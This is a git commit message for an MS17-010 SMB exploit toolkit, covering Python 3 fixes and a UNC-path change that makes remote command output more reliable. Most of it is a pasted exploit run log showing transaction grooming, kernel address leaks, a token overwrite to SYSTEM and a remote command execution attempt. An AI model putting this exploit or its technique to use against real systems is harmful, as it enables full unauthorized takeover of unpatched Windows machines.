Fixup Python 3 compat and workaround TCP over NetBIOS being disabled (#40)
* mysmb.py: Add missing imports and constants

* mysmb.py: Python 3 compat

 * Cannot concatenate string to bytes
 * configparser now(?) requires the values to be String

* mysmb.py: Use %COMPUTERNAME% in UNC path

Using the RFC1060 localhost IP doesn't resolve successfully on
all machines:

	C:\>echo foo > \\127.0.0.1\C$\bar
	echo foo > \\127.0.0.1\C$\bar
	The specified user does not exist.

	C:\>echo foo > \\localhost\C$\bam
	echo foo > \\localhost\C$\bam
	You were not connected because a duplicate name exists on the network. Go to System in Control Panel to change the computer name and try again.

	C:\>echo fo > \\localhost.localdomain\C$\bam
	echo fo > \\localhost.localdomain\C$\bam

	The network path was not found.

However, UNC paths work well and are documented to use the computer's
name for addressing.  Hence, switch to %COMPUTERNAME% for more reliable
execution.

Otherwise we may have errors such as:

	$ python ./zzz_exploit.py -debug tar.get.ip.42
	[*] Target OS: Windows 5.1
	[+] Found pipe 'netlogon'
	[+] Using named pipe: netlogon
	Groom packets
	attempt controlling next transaction on x86
	success controlling one transaction
	modify parameter count to 0xffffffff to be able to write backward
	leak next transaction
	CONNECTION: 0x81f06da8
	SESSION: 0xe10b93d8
	FLINK: 0x7bd48
	InData: 0x7ae28
	MID: 0xa
	TRANS1: 0x78b50
	TRANS2: 0x7ac90
	modify transaction struct for arbitrary read/write
	[*] make this SMB session to be SYSTEM
	[+] current TOKEN addr: 0xe10b3aa0
	Bad TOKEN_USER_GROUP offsets detected while parsing tokenData!
	RestrictedSids: 0xe1045a90
	RestrictedSidCount: 0x1f4
	userAndGroupCount: 0x4c
	userAndGroupsAddr: 0xe10b3b28
	Attempting WINXP SP0/SP1 x86 TOKEN_USER_GROUP workaround
	userAndGroupCount: 0x3
	userAndGroupsAddr: 0xe10b3b28
	[*] overwriting token UserAndGroups
	[*] have fun with the system smb session!
	DEBUG:root:Executing %COMSPEC% /Q /c  echo cd  ^> \\127.0.0.1\C$\uFWF 2^>^&1 > %TEMP%\ERgc.bat & %COMSPEC% /Q /c  %TEMP%\ERgc.bat & del %TEMP%\ERgc.bat
	Traceback (most recent call last):
	  File "/home/jkoenig/MS17-010/mysmb.py", line 518, in execute_remote
	    scmr.hRStartServiceW(self.__scmr, service)
	  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/scmr.py", line 1377, in hRStartServiceW
	    return dce.request(startService)
	           ^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 880, in request
	    raise exception
	impacket.dcerpc.v5.scmr.DCERPCSessionError: SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.
	[-] got exception
	Traceback (most recent call last):
	  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 769, in getFile
	    return self._SMBConnection.retr_file(shareName, pathName, callback)
	           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/usr/lib/python3/dist-packages/impacket/smb.py", line 4009, in retr_file
	    fid = self.nt_create_andx(tid, filename, shareAccessMode = shareAccessMode, accessMask = 0x20089)
	          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/home/jkoenig/MS17-010/mysmb.py", line 206, in nt_create_andx
	    self._last_fid = smb.SMB.nt_create_andx(self, tid, filename, smb_packet, cmd, shareAccessMode, disposition, accessMask)
	                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/usr/lib/python3/dist-packages/impacket/smb.py", line 3896, in nt_create_andx
	    if smb.isValidAnswer(SMB.SMB_COM_NT_CREATE_ANDX):
	       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/usr/lib/python3/dist-packages/impacket/smb.py", line 778, in isValidAnswer
	    raise SessionError("SMB Library Error", self['ErrorClass'] + (self['_reserved'] << 8), self['ErrorCode'], self['Flags2'] & SMB.FLAGS2_NT_STATUS, self)
	impacket.smb.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

	During handling of the above exception, another exception occurred:

	Traceback (most recent call last):
	  File "/home/jkoenig/MS17-010/./zzz_exploit.py", line 1039, in exploit
	    do_system_mysmb_session(conn, pipe_name, share, mode)
	  File "/home/jkoenig/MS17-010/./zzz_exploit.py", line 904, in do_system_mysmb_session
	    shell = RemoteShell(share, conn, mode, service_name)
	            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
	  File "/home/jkoenig/MS17-010/mysmb.py", line 448, in __init__
	    self.do_cd('')
	  File "/home/jkoenig/MS17-010/mysmb.py", line 480, in do_cd
	    self.execute_remote('cd ' )
	  File "/home/jkoenig/MS17-010/mysmb.py", line 526, in execute_remote
	    self.get_output()
	  File "/home/jkoenig/MS17-010/mysmb.py", line 498, in get_output
	    self.transferClient.getFile(self.__share, self.__outputFilename, output_callback)
	  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 773, in getFile
	    raise SessionError(e.get_error_code(), e.get_error_packet())
	impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
	CRITICAL:root:SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
	Done